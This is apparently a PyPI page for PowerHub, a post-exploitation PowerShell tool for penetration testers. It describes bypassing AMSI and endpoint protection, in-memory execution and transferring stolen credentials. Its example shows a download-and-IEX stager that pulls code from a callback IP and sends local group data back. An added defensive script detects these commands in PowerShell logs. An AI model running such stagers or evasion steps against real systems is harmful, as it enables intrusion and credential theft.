PowerHub
========
PowerHub is a convenient post-exploitation tool for PowerShell which aids a
pentester in transferring data, in particular code which may get flagged by
endpoint protection. Check out the
[Wiki](https://github.com/AdrianVollmer/PowerHub/wiki/)! Features:

* Fileless
* Stateless
* Cert pinning
* String "obfuscation" by RC4 encryption
* Choose your AMSI Bypass
* Transparent aliases for in-memory execution of C# programs

![PowerHub Webapp](https://github.com/AdrianVollmer/PowerHub/blob/master/img/powerhub-webapp.png)
![PowerHub Webapp](https://github.com/AdrianVollmer/PowerHub/blob/master/img/powerhub-sharphound.png)

During an engagement where you have a test client available, one of the
first things you want to do is run SharpHound, Seatbelt, PowerUp,
Invoke-PrivescCheck or PowerSploit. So you need to download the files,
mess with endpoint protection, disable the execution policy, etc.
PowerHub provides an (almost) one-click solution for this. Oh, and you can
also run arbitrary binaries (PE and shell code) entirely in-memory using
PowerSploit's modules, which is sometimes useful to bypass application
whitelisting.

Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back
either as a file or a text snippet, via the command line or the web
interface. PowerHub also helps with collaboration in case you're a small
team.

Here is a simple example (grab information about local groups with PowerView
and transfer it back):
```powershell
PS C:\Users\avollmer> $K=New-Object Net.WebClient;'a=reflection','t=http'|%{IEX $K.DownloadString('http://192.168.11.2:8080/0?'+$_)}
True
_____ _____ _ _ _ _______ ______ _ _ _ _ ______
|_____] | | | | | |______ |_____/ |_____| | | |_____]
| |_____| |__|__| |______ | \_ | | |_____| |_____]
1.11 written by Adrian Vollmer, 2018-2022
Run 'Help-PowerHub' for help
PS C:\Users\avollmer> Get-HubModule PowerView
Name : /home/avollmer/.local/share/powerhub/modules/PowerSploit/Recon/PowerView.ps1
Type : ps1
N : 205
Loaded : True
Alias :
PS C:\Users\avollmer> Get-LocalGroup | PushTo-Hub -Name groups.json
```
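From the defender's side, when script block logging is enabled (event ID 4104), the session above shows up as logged script text with three matchable traits: a web download combined with `IEX`, a cleartext `http://` URL whose host is an IP literal, and the PowerHub cmdlet names. The Python triage below is an added example, not part of PowerHub; the tag names and the two benign samples are constructed, and name matching alone is a weak signal because function names can change.

```python
import ipaddress
import re

# Script text as logged in the ScriptBlockText field of 4104 events. The first two
# entries are the commands shown on this page; the last two are constructed benign samples.
SAMPLES = [
    r"$K=New-Object Net.WebClient;'a=reflection','t=http'|%{IEX $K.DownloadString('http://192.168.11.2:8080/0?'+$_)}",
    r"Get-LocalGroup | PushTo-Hub -Name groups.json",
    r"Invoke-WebRequest -Uri https://example.com/report.csv -OutFile report.csv",
    r"Get-ChildItem C:\Temp | Sort-Object Length",
]

# Primitives that fetch remote content.
DOWNLOAD = re.compile(
    r"\b(?:Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest|Invoke-RestMethod)\b", re.I)
# Primitives that evaluate a string as code; lookarounds avoid matching inside longer names.
EXECUTE = re.compile(r"(?<![\w-])(?:IEX|Invoke-Expression)(?![\w-])", re.I)
# Cmdlet names that appear in the session on this page.
HUB_CMDLET = re.compile(r"\b(?:Get-HubModule|PushTo-Hub|Help-PowerHub)\b", re.I)
# Host part of an unencrypted URL (IPv4 literals and DNS names; bracketed IPv6 is not handled).
HTTP_HOST = re.compile(r"http://([\w.-]+)", re.I)


def findings(script_block: str) -> list[str]:
    """Return hypothetical triage tags for one logged script block."""
    tags = []
    if DOWNLOAD.search(script_block) and EXECUTE.search(script_block):
        tags.append("download-and-execute")
    for host in HTTP_HOST.findall(script_block):
        try:
            ipaddress.ip_address(host)
        except ValueError:
            continue  # a DNS name, not an IP literal
        tags.append("cleartext-http-to-ip-literal")
        break
    if HUB_CMDLET.search(script_block):
        tags.append("powerhub-cmdlet")
    return tags


def triage(script_blocks: list[str]) -> dict[int, list[str]]:
    """Map the index of each flagged script block to its tags; clean blocks are omitted."""
    return {i: t for i, s in enumerate(script_blocks) if (t := findings(s))}


if __name__ == "__main__":
    for index, tags in triage(SAMPLES).items():
        print(index, tags)
```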
Installation
============
PowerHub can be installed like any other Python package. Just execute
`python3 -m pip install powerhub`. If you like to work with virtual
environments, I recommend [pipx](https://github.com/pypa/pipx/).

If you want to use the latest version on the dev branch, clone this
repository and install with `python3 -m pip install -e .`.

For building the payloads, you need the MinGW GCC and Mono C# compilers. On
Debian-like systems, you can install them with `apt-get install mono-mcs
gcc-mingw-w64-x86-64 gcc-mingw-w64-i686`.

Usage
=====
PowerHub has one mandatory argument: the callback host (can be an IP
address). You should also use `--auth <user>:<pass>`; otherwise, a randomly
generated password will be used for basic authentication. The switch
`--no-auth` disables basic authentication, which is *not recommended*. The
callback host name is used by the stager to download the payload. If the
callback port or path differs from the default, it can also be changed.

Read `powerhub --help` and the [Wiki](https://github.com/AdrianVollmer/PowerHub/wiki/Usage) for details.

Credits
=======
PowerHub is partially based on the awesome work of zc00l, @am0nsec, mar10,
p3nt4, @SkelSec. And of course, it would be nothing without @harmj0y,
@mattifestation and the many other contributors to
[PowerSploit](https://github.com/PowerShellMafia/PowerSploit).

Thanks!

Author
======
Adrian Vollmer, 2018-2022

Disclaimer
==========
Use at your own risk. Do not use without full consent of everyone involved.
For educational purposes only.

Raw data
========

{
"_id": null,
"home_page": "https://github.com/AdrianVollmer/PowerHub",
"name": "PowerHub",
"maintainer": "",
"docs_url": null,
"requires_python": ">=3",
"maintainer_email": "",
"keywords": "",
"author": "Adrian Vollmer",
"author_email": "",
"download_url": "https://files.pythonhosted.org/packages/b2/a1/1cf38ba90668af48f8eba9ee21650ae04eca17a2338e7325671fe79f47f0/PowerHub-1.11.post1.tar.gz",
"platform": null,
"bugtrack_url": null,
"license": "",
"summary": "A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting",
"version": "1.11.post1",
"split_keywords": [],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "b2a11cf38ba90668af48f8eba9ee21650ae04eca17a2338e7325671fe79f47f0",
"md5": "64a3a54e543e268d0fb4d09711c85b34",
"sha256": "bbab86f3ba2341f4d91d5a3c0966c9b8ed741b4845e68c5239aa3877972f11c1"
},
"downloads": -1,
"filename": "PowerHub-1.11.post1.tar.gz",
"has_sig": false,
"md5_digest": "64a3a54e543e268d0fb4d09711c85b34",
"packagetype": "sdist",
"python_version": "source",
"requires_python": ">=3",
"size": 814974,
"upload_time": "2023-02-07T17:02:20",
"upload_time_iso_8601": "2023-02-07T17:02:20.983491Z",
"url": "https://files.pythonhosted.org/packages/b2/a1/1cf38ba90668af48f8eba9ee21650ae04eca17a2338e7325671fe79f47f0/PowerHub-1.11.post1.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2023-02-07 17:02:20",
"github": true,
"gitlab": false,
"bitbucket": false,
"github_user": "AdrianVollmer",
"github_project": "PowerHub",
"travis_ci": false,
"coveralls": false,
"github_actions": false,
"requirements": [
{
"name": "cheroot",
"specs": []
},
{
"name": "cryptography",
"specs": []
},
{
"name": "Flask",
"specs": [
[
">=",
"1.0.2"
]
]
},
{
"name": "Flask-SocketIO",
"specs": [
[
">=",
"3.1.2"
]
]
},
{
"name": "flask-sqlalchemy",
"specs": [
[
">=",
"2.1"
],
[
"<",
"3.0"
]
]
},
{
"name": "pyOpenSSL",
"specs": []
},
{
"name": "pypykatz",
"specs": [
[
">=",
"0.2.2"
]
]
},
{
"name": "python-magic",
"specs": []
},
{
"name": "service_identity",
"specs": []
},
{
"name": "sqlalchemy",
"specs": [
[
"<",
"2.0"
]
]
},
{
"name": "twisted",
"specs": [
[
">=",
"18.9.0"
]
]
},
{
"name": "watchdog",
"specs": []
},
{
"name": "werkzeug",
"specs": [
[
">=",
"0.15"
]
]
},
{
"name": "wsgidav",
"specs": [
[
">=",
"3.0.0"
]
]
}
],
"tox": true,
"lcname": "powerhub"
}